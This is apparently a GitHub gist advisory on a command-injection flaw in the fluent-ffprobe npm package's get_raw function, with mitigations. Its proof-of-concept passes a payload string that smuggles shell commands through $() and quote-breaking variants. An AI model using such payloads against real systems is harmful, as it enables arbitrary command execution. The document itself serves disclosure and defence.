@icemonster
Created February 24, 2024 11:57
ACI in fluent-ffprobe

Package source

Github repo

Package description

Library for quickly accessing ffprobe. You can use @ffprobe-installer/ffprobe to get the path

Vulnerability Overview

Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).

If attacker-controlled user input is passed to the get_raw function of the package, an attacker can execute arbitrary commands on the operating system that this package is running on.

This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].

[1] https://cwe.mitre.org/data/definitions/77.html

[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback

Reproduction

The proof-of-concept code below illustrates the issue. Executing this code will cause the command touch /tmp/success to be executed, leading to the creation of a file called success in the /tmp directory.

var PUT = require('fluent-ffprobe');
var x0 = " $(touch /tmp/success) # \" || touch /tmp/success # ' || touch /tmp/success";
var x1 = '.';
var x2 = ')}@';
PUT["get_raw"](x0,x1,x2)();

Environment: Node.js v15.5.0 on Linux

Steps to reproduce:

  1. npm i fluent-ffprobe@1.5.1
  2. Create a file, poc.js, containing the PoC code.
  3. Execute the file: node poc.js

A file called success will be created in the /tmp directory as a result of executing the PoC.

Mitigation

  • Consider using execFile [1] or execFileSync [2] if possible, which do not spawn a shell.
  • If possible, consider only passing inputs to exec that match a predefined allow-list.
  • If using an allow-list is not possible, consider sanitizing inputs to exec such that they do not contain shell meta-characters such as $().